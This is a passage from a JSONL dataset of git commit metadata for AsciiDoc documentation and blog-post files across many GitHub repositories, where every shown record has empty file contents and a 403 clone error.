place\n","repos":"akgood\/yubico-piv-tool,ato\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,hirden\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool,hirden\/yubico-piv-tool,ato\/yubico-piv-tool,Yubico\/yubico-piv-tool,Yubico\/yubico-piv-tool","old_file":"doc\/Windows-Certificate.asciidoc","new_file":"doc\/Windows-Certificate.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-piv-tool.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5d363e8cfbbac838f243fe3c06111205bcda897f","subject":"Update 2017-02-21.adoc","message":"Update 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-21.adoc","new_file":"_posts\/2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"77150a6af99eeec7266061d0a39e610aa145f565","subject":"Update 2016-03-30-Analisis-Paquetes.adoc","message":"Update 2016-03-30-Analisis-Paquetes.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_file":"_posts\/2016-03-30-Analisis-Paquetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a6dd5a24fb94a236c3d4d5ad5f408610d83bd96","subject":"Update 2015-02-01-the-AsciiDoc-introduction.adoc","message":"Update 2015-02-01-the-AsciiDoc-introduction.adoc","repos":"deepwind\/deepwind.github.io,deepwind\/deepwind.github.io,deepwind\/deepwind.github.io","old_file":"_posts\/2015-02-01-the-AsciiDoc-introduction.adoc","new_file":"_posts\/2015-02-01-the-AsciiDoc-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deepwind\/deepwind.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c1b7d2f65766e189ed3c261175764126e6ddaa0","subject":"y2b create post Best Smartphone Under $400?","message":"y2b create post Best Smartphone Under $400?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-08-30-Best-Smartphone-Under-400.adoc","new_file":"_posts\/2015-08-30-Best-Smartphone-Under-400.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7adddb6b300b66aa73df426de55382b3c33b249e","subject":"Remove old SecurityContextHolder Docs","message":"Remove old SecurityContextHolder Docs\n\nIssue gh-8005\n","repos":"djechelon\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,rwinch\/spring-security,djechelon\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,fhanik\/spring-security,fhanik\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,djechelon\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,rwinch\/spring-security,fhanik\/spring-security,jgrandja\/spring-security,fhanik\/spring-security,rwinch\/spring-security,jgrandja\/spring-security,rwinch\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/architecture\/technical-overview.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/architecture\/technical-overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fhanik\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4631b2fc4deb871b218b4c2206f1bbf9c609eeff","subject":"y2b create post My Problem With The Apple Watch...","message":"y2b create post My Problem With The Apple Watch...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-01-My-Problem-With-The-Apple-Watch.adoc","new_file":"_posts\/2016-08-01-My-Problem-With-The-Apple-Watch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0cf0e844bb724921d48f599698ea3f363d0ecbc","subject":"y2b create post Using The World's Smallest Phone...","message":"y2b create post Using The World's Smallest Phone...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-20-Using-The-Worlds-Smallest-Phone.adoc","new_file":"_posts\/2016-08-20-Using-The-Worlds-Smallest-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d045189e36e73ebc7078b8b6b94333ff5f29be9d","subject":"Update 2013-10-16-Episode-1-The-Pilot.adoc","message":"Update 2013-10-16-Episode-1-The-Pilot.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2013-10-16-Episode-1-The-Pilot.adoc","new_file":"_posts\/2013-10-16-Episode-1-The-Pilot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67c2115dc88fb6cb772d53ae936c50c0453dc6bc","subject":"y2b create post Razer Project Fiona Gaming Tablet","message":"y2b create post Razer Project Fiona Gaming Tablet","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-12-Razer-Project-Fiona-Gaming-Tablet.adoc","new_file":"_posts\/2012-01-12-Razer-Project-Fiona-Gaming-Tablet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eda9b5608332afc63bcc131f4d36e70bf4de79c0","subject":"Ref doc for Spanner (#465)","message":"Ref doc for Spanner (#465)\n\n* Ref doc for Spanner\r\n\r\n* format fix\r\n\r\n* link fix\r\n","repos":"spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp","old_file":"docs\/src\/main\/asciidoc\/spanner.adoc","new_file":"docs\/src\/main\/asciidoc\/spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-gcp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f4dea4845a27e185da23813424c5ad8f346e6a4b","subject":"Add clj script guide","message":"Add clj script guide\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/clj.adoc","new_file":"content\/guides\/clj.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e4ac4665282b7e755026bb6163b0979a25c08f0f","subject":"y2b create post SWITCHING TO SAMSUNG GALAXY S7","message":"y2b create post SWITCHING TO SAMSUNG GALAXY S7","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-03-22-SWITCHING-TO-SAMSUNG-GALAXY-S7.adoc","new_file":"_posts\/2016-03-22-SWITCHING-TO-SAMSUNG-GALAXY-S7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a64c9a6d492fced40d8ec286bdc7bcc81634d212","subject":"Add README.adoc for hdfs-dataset","message":"Add README.adoc for hdfs-dataset\n\nResolves #211\n","repos":"spring-cloud\/spring-cloud-stream-app-starters,spring-cloud\/spring-cloud-stream-app-starters,spring-cloud\/spring-cloud-stream-app-starters,sobychacko\/spring-cloud-stream-app-starters,sobychacko\/spring-cloud-stream-app-starters,sobychacko\/spring-cloud-stream-app-starters,spring-cloud\/spring-cloud-stream-app-starters,sobychacko\/spring-cloud-stream-app-starters","old_file":"hdfs\/spring-cloud-starter-stream-sink-hdfs-dataset\/README.adoc","new_file":"hdfs\/spring-cloud-starter-stream-sink-hdfs-dataset\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sobychacko\/spring-cloud-stream-app-starters.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b9ecf1f0c7201985d7e6a1851c926a3dd8453038","subject":"Initializing openshift-docs repo","message":"Initializing openshift-docs repo\n","repos":"nhr\/ascii_binder,Fryguy\/ascii_binder,nhr\/ascii_binder,Fryguy\/doc_site_builder,Fryguy\/ascii_binder,redhataccess\/ascii_binder,redhataccess\/doc_site_builder,redhataccess\/doc_site_builder,redhataccess\/ascii_binder","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Fryguy\/doc_site_builder.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6607350b0743ca03bef4807a50d9e25a555a492d","subject":"doc: ASTF typos","message":"doc: ASTF typos\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"doc\/trex_astf.asciidoc","new_file":"doc\/trex_astf.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dimagol\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"87bd862cb63785158affc065724b57bda7a5a7f4","subject":"[docs] Add another workaround for macOS","message":"[docs] Add another workaround for macOS\n\nI encountered an issue that was preventing me from building thirdparties\nand with Adar's help I found a way to get unstuck. This patch adds more\ninstructions to our macOS installation instructions.\n\nChange-Id: I870189eddec0a2e34221b5bbdf85353a91fcf527\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/6456\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ef155642f32abe17ccea09b764c1e331fb6fc354","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"47f0281275682bf64b1a16343d22e281da245ff5","subject":"y2b create post GOT NEW SPEAKERS! (Audioengine A5+ Unboxing)","message":"y2b create post GOT NEW SPEAKERS! (Audioengine A5+ Unboxing)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-03-05-GOT-NEW-SPEAKERS-Audioengine-A5-Unboxing.adoc","new_file":"_posts\/2014-03-05-GOT-NEW-SPEAKERS-Audioengine-A5-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ad09b400fd2447812e7e7bfbc223cb4541b28c14","subject":"y2b create post 3 Cool Gadgets Under $50","message":"y2b create post 3 Cool Gadgets Under $50","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-18-3-Cool-Gadgets-Under-50.adoc","new_file":"_posts\/2017-04-18-3-Cool-Gadgets-Under-50.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddedfc1d40f64f6e4422794df27179f8389624a1","subject":"Updates book-using-jison-beyond-the-basics\/1_Goal.adoc","message":"Updates book-using-jison-beyond-the-basics\/1_Goal.adoc\n\nAuto commit by GitBook Editor","repos":"GerHobbelt\/jison,GerHobbelt\/jison,GerHobbelt\/jison,GerHobbelt\/jison","old_file":"book-using-jison-beyond-the-basics\/1_Goal.adoc","new_file":"book-using-jison-beyond-the-basics\/1_Goal.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GerHobbelt\/jison.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"501ff121885eab87fd05c37988910dd6924a32df","subject":"Update 2016-10-02-Welcome-Blogging-World.adoc","message":"Update 2016-10-02-Welcome-Blogging-World.adoc","repos":"PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io","old_file":"_posts\/2016-10-02-Welcome-Blogging-World.adoc","new_file":"_posts\/2016-10-02-Welcome-Blogging-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PierreBtz\/pierrebtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32f2e0017cfcdc4592008dd30cec9d8a0c4e7311","subject":"Update 2015-10-02-When-Epiales-Calls.adoc","message":"Update 2015-10-02-When-Epiales-Calls.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-02-When-Epiales-Calls.adoc","new_file":"_posts\/2015-10-02-When-Epiales-Calls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91d8e0a45ceb5ff095fc7202d5e7133c85848230","subject":"Delete the file at '_posts\/2017-05-31-Naming-Conventions.adoc'","message":"Delete the file at '_posts\/2017-05-31-Naming-Conventions.adoc'","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-31-Naming-Conventions.adoc","new_file":"_posts\/2017-05-31-Naming-Conventions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f856c10879e76df3c6f49890a7990ce14013e4c","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3e2e6d0618da26eca4a5cbc464241a6acc03987","subject":"Update 2017-04-23-Server-Virtualization-Management.adoc","message":"Update 2017-04-23-Server-Virtualization-Management.adoc","repos":"roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io,roobyz\/roobyz.github.io","old_file":"_posts\/2017-04-23-Server-Virtualization-Management.adoc","new_file":"_posts\/2017-04-23-Server-Virtualization-Management.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/roobyz\/roobyz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f881c474e075713f0bfc5f90228ff11bc260ae4","subject":"Update 2016-07-08-Word-Press-3.adoc","message":"Update 2016-07-08-Word-Press-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_file":"_posts\/2016-07-08-Word-Press-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fec9dc0558163ba48e1470dd2cbc7642292b403d","subject":"Update 2016-08-31-Another-Post.adoc","message":"Update 2016-08-31-Another-Post.adoc","repos":"crisgoncalves\/crisgoncalves.github.io,crisgoncalves\/crisgoncalves.github.io,crisgoncalves\/crisgoncalves.github.io,crisgoncalves\/crisgoncalves.github.io","old_file":"_posts\/2016-08-31-Another-Post.adoc","new_file":"_posts\/2016-08-31-Another-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crisgoncalves\/crisgoncalves.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a689b994b5fb50d57031ecc8c97df8ab5d11f92f","subject":"Update 2017-05-12-picture-book.adoc","message":"Update 2017-05-12-picture-book.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-picture-book.adoc","new_file":"_posts\/2017-05-12-picture-book.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c52c22b10e247e9975f207fe05fdc41d563660ba","subject":"New implicit provisioning hack document for current workflow.","message":"New implicit provisioning hack document for current workflow.\n","repos":"advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr","old_file":"docs\/hacky-implicit-provisioning-version2.adoc","new_file":"docs\/hacky-implicit-provisioning-version2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"85a7be9cf062df0a8de3c469d770168055246e9e","subject":"Improve readme confusion","message":"Improve readme confusion\n","repos":"haiodo\/Nim,sferik\/Nim,singularperturbation\/Nim,sferik\/Nim,singularperturbation\/Nim,xland\/Nim,greyanubis\/Nim,Senketsu\/Nim,tmm1\/Nim,JCavallo\/Nim,reactormonk\/nim,nimLuckyBull\/Nim,Senketsu\/Nim,russpowers\/Nim,fredericksilva\/Nim,fmamud\/Nim,mbaulch\/Nim,msmith491\/Nim,Senketsu\/Nim,endragor\/Nim,russpowers\/Nim,nanoant\/Nim,bvssvni\/Nim,Matt14916\/Nim,greyanubis\/Nim,tmm1\/Nim,fredericksilva\/Nim,fmamud\/Nim,jfhg\/Nim,JCavallo\/Nim,Salafit\/Nim,jfhg\/Nim,Matt14916\/Nim,singularperturbation\/Nim,JCavallo\/Nim,Matt14916\/Nim,fmamud\/Nim,mbaulch\/Nim,msmith491\/Nim,nafsaka\/Nim,haiodo\/Nim,judofyr\/Nim,Dhertz\/Nim,endragor\/Nim,zachaysan\/Nim,jsanjuas\/Nim,tmm1\/Nim,nafsaka\/Nim,nafsaka\/Nim,douglas-larocca\/Nim,nanoant\/Nim,jsanjuas\/Nim,Senketsu\/Nim,singularperturbation\/Nim,Dhertz\/Nim,jsanjuas\/Nim,mbaulch\/Nim,fredericksilva\/Nim,russpowers\/Nim,jfhg\/Nim,douglas-larocca\/Nim,flaviut\/nre,sferik\/Nim,douglas-larocca\/Nim,Salafit\/Nim,zachaysan\/Nim,Dhertz\/Nim,msmith491\/Nim,sferik\/Nim,fmamud\/Nim,sarvex\/Nim-lang,endragor\/Nim,bvssvni\/Nim,Matt14916\/Nim,reactormonk\/nim,nafsaka\/Nim,Senketsu\/Nim,judofyr\/Nim,tulayang\/Nim,tmm1\/Nim,nanoant\/Nim,BlaXpirit\/nre,tulayang\/Nim,endragor\/Nim,russpowers\/Nim,jsanjuas\/Nim,sarvex\/Nim-lang,xland\/Nim,dom96\/Nim,Dhertz\/Nim,singularperturbation\/Nim,tulayang\/Nim,haiodo\/Nim,reactormonk\/nim,fredericksilva\/Nim,xland\/Nim,msmith491\/Nim,Salafit\/Nim,douglas-larocca\/Nim,reactormonk\/nim,reactormonk\/nim,zachaysan\/Nim,zachaysan\/Nim,tmm1\/Nim,nimLuckyBull\/Nim,xland\/Nim,greyanubis\/Nim,xland\/Nim,fredericksilva\/Nim,sferik\/Nim,BlaXpirit\/nre,haiodo\/Nim,nimLuckyBull\/Nim,sarvex\/Nim-lang,fredericksilva\/Nim,sferik\/Nim,singularperturbation\/Nim,nimLuckyBull\/Nim,nafsaka\/Nim,haiodo\/Nim,zachaysan\/Nim,mbaulch\/Nim,nafsaka\/Nim,sarvex\/Nim-lang,douglas-larocca\/Nim,msmith491\/Nim,nanoant\/Nim,sarvex\/Nim-lang,JCavallo\/Nim,bvssvni\/Nim,tulayang\/Nim,nafsaka\/Nim,dom96\/Nim,Senketsu\/Nim,Matt14916\/Nim,mbaulch\/Nim,reactormonk\/nim,greyanubis\/Nim,douglas-larocca\/Nim,douglas-larocca\/Nim,judofyr\/Nim,haiodo\/Nim,tulayang\/Nim,msmith491\/Nim,sferik\/Nim,judofyr\/Nim,msmith491\/Nim,Dhertz\/Nim,nimLuckyBull\/Nim,dom96\/Nim,xland\/Nim,greyanubis\/Nim,nanoant\/Nim,jfhg\/Nim,jsanjuas\/Nim,judofyr\/Nim,JCavallo\/Nim,nimLuckyBull\/Nim,fmamud\/Nim,tmm1\/Nim,nimLuckyBull\/Nim,dom96\/Nim,nanoant\/Nim,fredericksilva\/Nim,zachaysan\/Nim,douglas-larocca\/Nim,nanoant\/Nim,endragor\/Nim,russpowers\/Nim,judofyr\/Nim,Salafit\/Nim,sarvex\/Nim-lang,sarvex\/Nim-lang,Dhertz\/Nim,russpowers\/Nim,JCavallo\/Nim,fmamud\/Nim,dom96\/Nim,Salafit\/Nim,judofyr\/Nim,endragor\/Nim,tulayang\/Nim,zachaysan\/Nim,Senketsu\/Nim,bvssvni\/Nim,mbaulch\/Nim,Matt14916\/Nim,fmamud\/Nim,russpowers\/Nim,dom96\/Nim,reactormonk\/nim,jsanjuas\/Nim,jfhg\/Nim,Dhertz\/Nim,jfhg\/Nim,greyanubis\/Nim,haiodo\/Nim,bvssvni\/Nim,Matt14916\/Nim,mbaulch\/Nim,bvssvni\/Nim,singularperturbation\/Nim,tmm1\/Nim,greyanubis\/Nim,judofyr\/Nim,Salafit\/Nim,xland\/Nim,Salafit\/Nim,sferik\/Nim,jfhg\/Nim,bvssvni\/Nim,dom96\/Nim,reactormonk\/nim,endragor\/Nim,JCavallo\/Nim,fredericksilva\/Nim,jsanjuas\/Nim","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tulayang\/Nim.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3fce804a7a760b99ab95abf5ec209437ba823dc3","subject":"First draft of Type Coercion CIP","message":"First draft of Type Coercion CIP\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/1.accepted\/CIP2015-11-09-type-coercions.adoc","new_file":"cip\/1.accepted\/CIP2015-11-09-type-coercions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7cbd3e85d7fbc56b99985a98a910c96097a356de","subject":"Update 2011-11-19-1-semaine-a-Devoxx.adoc","message":"Update 2011-11-19-1-semaine-a-Devoxx.adoc","repos":"fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io,fbiville\/fbiville.github.io","old_file":"_posts\/2011-11-19-1-semaine-a-Devoxx.adoc","new_file":"_posts\/2011-11-19-1-semaine-a-Devoxx.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fbiville\/fbiville.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8616e0ba07b82c3483034f95714efb83f3147f65","subject":"Publish 2016-6-25-Git-one.adoc","message":"Publish 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c287bc67fb26bb4c562b66c371428f60d1361ee","subject":"added temporary readme","message":"added temporary readme\n","repos":"HebiRobotics\/hebi-matlab-examples,HebiRobotics\/hebi-matlab-examples","old_file":"kits\/edward\/readme.adoc","new_file":"kits\/edward\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HebiRobotics\/hebi-matlab-examples.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"38e7762a46212563b7b432d221303b4e4ba4efb5","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Dev tools\/Eclipse.adoc","new_file":"Dev tools\/Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7de8b7008e352f14056348988ac2f7f472d70dda","subject":"Docs: Tidied docs for field-stats","message":"Docs: Tidied docs for 